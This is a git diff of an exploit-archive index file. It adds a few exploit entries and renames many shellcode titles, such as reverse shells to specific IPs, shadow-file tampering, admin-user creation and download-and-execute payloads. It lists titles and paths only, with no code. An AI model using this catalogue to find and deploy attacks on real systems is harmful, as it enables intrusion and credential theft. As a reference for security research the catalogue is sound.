diff --git a/files.csv b/files.csv
index 40e3c2a9f..d1d58ab56 100644
--- a/files.csv
+++ b/files.csv
@@ -5653,12 +5653,16 @@ id,file,description,date,author,platform,type,port
 42473,platforms/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos,0
 42474,platforms/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos,0
 42475,platforms/windows/dos/42475.html,"Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly",2017-08-17,"Google Security Research",windows,dos,0
-42476,platforms/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments",2017-08-17,"Google Security Research",windows,dos,0
+42476,platforms/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments (1)",2017-08-17,"Google Security Research",windows,dos,0
 42477,platforms/windows/dos/42477.html,"Microsoft Edge Chakra - Uninitialized Arguments (2)",2017-08-17,"Google Security Research",windows,dos,0
 42478,platforms/windows/dos/42478.html,"Microsoft Edge Chakra - 'EmitNew' Integer Overflow",2017-08-17,"Google Security Research",windows,dos,0
 42479,platforms/windows/dos/42479.html,"Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3",2017-08-17,"Google Security Research",windows,dos,0
 42480,platforms/windows/dos/42480.txt,"Adobe Flash - Invoke Accesses Trait Out-of-Bounds",2017-08-17,"Google Security Research",windows,dos,0
 42481,platforms/windows/dos/42481.js,"Microsoft Edge - Out-of-Bounds Access when Fetching Source",2017-08-17,"Google Security Research",windows,dos,0
+42483,platforms/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos,0
+42486,platforms/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
+42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
+42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare <= NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9153,6 +9157,7 @@ id,file,description,date,author,platform,type,port
 41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
 41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
+42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
@@ -14900,7 +14905,7 @@ id,file,description,date,author,platform,type,port
 34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 - dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0
 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0
 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
-34856,platforms/windows/remote/34856.py,"Kolibri WebServer 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80
+34856,platforms/windows/remote/34856.py,"Kolibri WebServer 2.0 - Buffer Overflow (EMET 5.0 / EMET 4.1 Partial Bypass)",2014-10-02,tekwizz123,windows,remote,80
 34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 - Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0
 34862,platforms/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)",2014-10-02,Metasploit,linux,remote,21
 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow (Metasploit)",2014-10-02,Metasploit,linux,remote,7426
@@ -15735,6 +15740,7 @@ id,file,description,date,author,platform,type,port
 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
+42222,platforms/windows/remote/42222.py,"SpyCamLizard 1.230 - Buffer Overflow",2017-06-20,abatchy17,windows,remote,0
 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
 42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
@@ -15755,22 +15761,23 @@ id,file,description,date,author,platform,type,port
 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
+42484,platforms/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
 13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0
 13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
-13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
+13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - Bind Shell  31337/TCP + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
 13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
 13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
-13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind 31337/TCP Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
+13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
 13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind Random Port Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
-13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
+13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
 13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
 13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
-13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
+13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
 13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
-13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Reverse Portbind 6969/TCP Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
+13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Reverse Shell 6969/TCP Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
 13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0
 13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0
 13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0
@@ -15780,7 +15787,7 @@ id,file,description,date,author,platform,type,port
 13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0
 13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect + recv + jmp + return results Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
 13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
-13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse Portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
+13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse Shell 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0
 13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
@@ -15800,10 +15807,10 @@ id,file,description,date,author,platform,type,port
 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0
 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0
-13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
+13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode,0
 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
-13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback 21/TCP Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
@@ -15946,7 +15953,7 @@ id,file,description,date,author,platform,type,port
 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0
 13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - iptables -F Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0
 13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - iptables -F Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
-13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0
+13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0
 13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - connect Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
 13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
@@ -16034,7 +16041,7 @@ id,file,description,date,author,platform,type,port
 13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0
 13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download + Exec Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0
 13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
-13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
+13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
@@ -16164,8 +16171,8 @@ id,file,description,date,author,platform,type,port
 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0
 15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
 15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
-15314,platforms/arm/shellcode/15314.asm,"ARM - Bind Shell Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect 68/UDP Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15314,platforms/arm/shellcode/15314.asm,"ARM - Bind Shell 0x1337/TCP Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect 68/UDP (Reverse Shell 192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
@@ -16177,10 +16184,10 @@ id,file,description,date,author,platform,type,port
 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod(_/etc/shadow__ 0666) + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Shell Netcat 6666/TCP Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
-17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
+17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
-17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
+17326,platforms/windows/shellcode/17326.rb,"Windows - Reverse Download and Execute via DNS (IPv6) Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
@@ -16199,7 +16206,7 @@ id,file,description,date,author,platform,type,port
 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0
 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
-21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
+21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@@ -16207,13 +16214,13 @@ id,file,description,date,author,platform,type,port
 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
-25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
+25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
 40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
-40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Reverse Persistent TCP Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Reverse TCP Persistent Shell (192.168.232.129:4444/TCP) Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
 29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse Shell (192.168.1.177:31337) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0
 40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind Shell 4444/TCP Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@@ -16293,15 +16300,15 @@ id,file,description,date,author,platform,type,port
 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind 4444/TCP Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
-39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
+39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password Prompt Shell (127.0.0.1:4444) Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
-39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
-39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
+39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
